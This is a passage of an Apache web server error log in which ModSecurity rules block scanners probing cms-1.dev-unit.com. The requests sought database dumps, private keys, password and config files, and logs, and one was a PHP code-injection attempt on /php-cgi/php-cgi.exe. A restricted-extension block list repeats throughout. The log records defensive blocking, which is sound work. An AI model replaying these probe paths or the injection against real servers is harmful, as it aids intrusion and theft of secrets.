"OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "cms-1.dev-unit.com"] [uri "/db.sql"] [unique_id "aGGtA3YyGnwcPpPuQvPfRAAAANM"] [Mon Jun 30 00:15:47.673402 2025] [:error] [pid 29331:tid 140563525326592] [client 185.177.72.10:54858] [client 185.177.72.10] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "cms-1.dev-unit.com"] [uri "/dump.sql"] [unique_id "aGGtA3YyGnwcPpPuQvPfRQAAANc"] [Mon Jun 30 00:15:47.681697 2025] [:error] [pid 29331:tid 140563759286016] [client 185.177.72.10:54858] [client 185.177.72.10] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "cms-1.dev-unit.com"] [uri "/database.sql"] [unique_id "aGGtA3YyGnwcPpPuQvPfRgAAAMQ"] [Mon Jul 14 16:44:27.157754 2025] [:error] [pid 9637:tid 140038759220992] [client 20.171.207.130:36950] [client 20.171.207.130] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".com"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "cms-1.dev-unit.com"] [uri "/event/organize@gmail.com"] [unique_id "aHUJuxndiaGXr9t9Nccn1wAAAQg"] [Mon Jul 14 16:46:42.722430 2025] [autoindex:error] [pid 9637:tid 140038666901248] [client 20.171.207.130:38410] AH01276: Cannot serve directory /home/id/cms-1.dev-unit.com/assets/front/img/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Thu Jul 31 07:41:37.661814 2025] [:error] [pid 31038:tid 140191322814208] [client 198.144.182.13:57208] PHP Warning: Undefined variable $tmp in /home/id/cms-1.dev-unit.com/defauit.php on line 33, referer: https://www.google.com [Sat Aug 09 00:54:25.136983 2025] [:error] [pid 29644:tid 29684] [client 142.93.143.8:55418] [client 142.93.143.8] ModSecurity: Access denied with code 403 (phase 2). Pattern match "<\\\\?(?!xml)" at ARGS_NAMES:<?php $env["USERNAME"] . [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_40_generic_attacks.conf"] [line "230"] [id "959151"] [rev "2"] [msg "PHP Injection Attack"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A6"] [tag "PCI/6.5.2"] [tag "WASCTC/WASC-25"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE4"] [tag "PCI/6.5.2"] [hostname "cms-1.dev-unit.com"] [uri "/php-cgi/php-cgi.exe"] [unique_id "aJZyEdf6g9KNVB5mOMBeJAAAAIE"] [Sat Aug 09 00:54:25.337283 2025] [:error] [pid 29744:tid 29752] [client 46.101.1.225:35654] [client 46.101.1.225] ModSecurity: Access denied with code 403 (phase 2). Pattern match "<\\\\?(?!xml)" at ARGS_NAMES:<?php $env["USERNAME"] . [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_40_generic_attacks.conf"] [line "230"] [id "959151"] [rev "2"] [msg "PHP Injection Attack"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A6"] [tag "PCI/6.5.2"] [tag "WASCTC/WASC-25"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE4"] [tag "PCI/6.5.2"] [hostname "cms-1.dev-unit.com"] [uri "/php-cgi/php-cgi.exe"] [unique_id "aJZyEQCFAVwl5yvo7JSItwAAAMY"] [Sat Aug 09 00:54:27.421134 2025] [authz_core:error] [pid 29744:tid 29759] [client 142.93.143.8:55476] AH01630: client denied by server configuration: /home/id/cms-1.dev-unit.com/server-status [Sat Aug 09 00:54:27.432231 2025] [authz_core:error] [pid 29643:tid 29706] [client 46.101.1.225:53988] AH01630: client denied by server configuration: /home/id/cms-1.dev-unit.com/server-status [Sat Aug 09 15:55:30.020825 2025] [:error] [pid 19140:tid 19164] [client 213.232.87.230:22101] [client 213.232.87.230] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "cms-1.dev-unit.com"] [uri "/dump.sql"] [unique_id "aJdFQtZWQqB9kC0z6L_mwwAAABI"] [Sat Aug 09 15:55:30.026120 2025] [:error] [pid 31076:tid 31101] [client 213.232.87.230:30735] [client 213.232.87.230] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "cms-1.dev-unit.com"] [uri "/backup.sql"] [unique_id "aJdFQjhU1dFqqif738af0wAAARI"] [Sat Aug 09 15:55:30.028452 2025] [:error] [pid 19140:tid 19156] [client 213.232.87.230:13173] [client 213.232.87.230] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".db"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "cms-1.dev-unit.com"] [uri "/.svn/wc.db"] [unique_id "aJdFQtZWQqB9kC0z6L_myAAAAAo"] [Sat Aug 09 15:55:30.032062 2025] [:error] [pid 19140:tid 19146] [client 213.232.87.230:59931] [client 213.232.87.230] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "cms-1.dev-unit.com"] [uri "/database_backup.sql"] [unique_id "aJdFQtZWQqB9kC0z6L_mygAAAAA"] [Sat Aug 09 15:55:30.048471 2025] [authz_host:error] [pid 19140:tid 19157] [client 213.232.87.230:31069] AH01753: access check of 'localhost' to /server-status failed, reason: unable to get the remote host name [Sat Aug 09 15:55:30.048497 2025] [authz_core:error] [pid 19140:tid 19157] [client 213.232.87.230:31069] AH01630: client denied by server configuration: /home/id/cms-1.dev-unit.com/server-status [Sat Aug 09 15:55:30.074019 2025] [:error] [pid 19140:tid 19170] [client 213.232.87.230:57353] [client 213.232.87.230] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".key"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "cms-1.dev-unit.com"] [uri "/etc/ssl/private/server.key"] [unique_id "aJdFQtZWQqB9kC0z6L_mzQAAABg"] [Sat Aug 09 15:55:30.084376 2025] [:error] [pid 19140:tid 19169] [client 213.232.87.230:12101] [client 213.232.87.230] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".config"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "cms-1.dev-unit.com"] [uri "/web.config"] [unique_id "aJdFQtZWQqB9kC0z6L_mzwAAABc"] [Sat Aug 09 15:55:30.089151 2025] [:error] [pid 19140:tid 19148] [client 213.232.87.230:35433] [client 213.232.87.230] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "cms-1.dev-unit.com"] [uri "/database.sql"] [unique_id "aJdFQtZWQqB9kC0z6L_m0gAAAAI"] [Sat Aug 09 15:55:30.097879 2025] [:error] [pid 19140:tid 19153] [client 213.232.87.230:30217] [client 213.232.87.230] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".pwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "cms-1.dev-unit.com"] [uri "/_vti_pvt/service.pwd"] [unique_id "aJdFQtZWQqB9kC0z6L_m1QAAAAc"] [Sat Aug 09 15:55:30.141312 2025] [:error] [pid 31076:tid 31104] [client 213.232.87.230:33169] [client 213.232.87.230] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".key"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "cms-1.dev-unit.com"] [uri "/server.key"] [unique_id "aJdFQjhU1dFqqif738af2AAAARU"] [Mon Aug 11 14:00:36.962311 2025] [:error] [pid 1371:tid 1377] [client 198.144.182.13:36726] PHP Warning: Undefined variable $tmp in /home/id/cms-1.dev-unit.com/defauit.php on line 33, referer: https://www.google.com [Tue Aug 12 06:08:01.826852 2025] [:error] [pid 28811:tid 28819] [client 198.144.182.13:41240] PHP Warning: Undefined variable $tmp in /home/id/cms-1.dev-unit.com/defauit.php on line 33, referer: https://www.google.com [Wed Aug 13 08:34:48.425239 2025] [:error] [pid 12050:tid 12090] [client 198.144.182.13:47332] PHP Warning: Undefined variable $tmp in /home/id/cms-1.dev-unit.com/defauit.php on line 33, referer: https://www.google.com [Wed Aug 13 18:49:30.398112 2025] [:error] [pid 15178:tid 15205] [client 198.144.182.13:56220] PHP Warning: Undefined variable $tmp in /home/id/cms-1.dev-unit.com/defauit.php on line 33, referer: https://www.google.com [Wed Aug 13 23:43:31.876608 2025] [:error] [pid 15178:tid 15190] [client 185.177.72.204:2454] [client 185.177.72.204] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".log"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "cms-1.dev-unit.com"] [uri "/storage/logs/laravel.log"] [unique_id "aJz48zSzh4MhgQx9hZdVDQAAAQA"] [Wed Aug 13 23:43:31.973573 2025] [:error] [pid 15178:tid 15193] [client 185.177.72.204:2454] [client 185.177.72.204] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".log"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "cms-1.dev-unit.com"] [uri "/storage/logs/error.log"] [unique_id "aJz48zSzh4MhgQx9hZdVDgAAAQM"] [Wed Aug 13 23:43:32.033484 2025] [:error] [pid 15178:tid 15212] [client 185.177.72.204:2454] [client 185.177.72.204] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".log"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "cms-1.dev-unit.com"] [uri "/logs/debug.log"] [unique_id "aJz49DSzh4MhgQx9hZdVDwAAARY"] [Wed Aug 13 23:43:32.056226 2025] [:error] [pid 15178:tid 15195] [client 185.177.72.204:2454] [client 185.177.72.204] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".log"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "cms-1.dev-unit.com"] [uri "/logs/app.log"] [unique_id "aJz49DSzh4MhgQx9hZdVEAAAAQU"] [Wed Aug 13 23:43:32.089344 2025] [:error] [pid 15178:tid 15213] [client 185.177.72.204:2454] [client 185.177.72.204] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".log"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "cms-1.dev-unit.com"] [uri "/debug.log"] [unique_id "aJz49DSzh4MhgQx9hZdVEQAAARc"] [Wed Aug 13 23:43:32.138727 2025] [:error] [pid 15178:tid 15214] [client 185.177.72.204:2454] [client 185.177.72.204] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".log"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "cms-1.dev-unit.com"] [uri "/error.log"] [unique_id "aJz49DSzh4MhgQx9hZdVEgAAARg"] [Wed Aug 13 23:43:33.086151 2025] [:error] [pid 15178:tid 15203] [client 185.177.72.204:2454] [client 185.177.72.204] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".backup"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "cms-1.dev-unit.com"] [uri "/.backup"] [unique_id "aJz49TSzh4MhgQx9hZdVFgAAAQ0"] [Wed Aug 13 23:43:33.094241 2025] [:error] [pid 15178:tid 15208] [client 185.177.72.204:2454] [client 185.177.72.204] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ 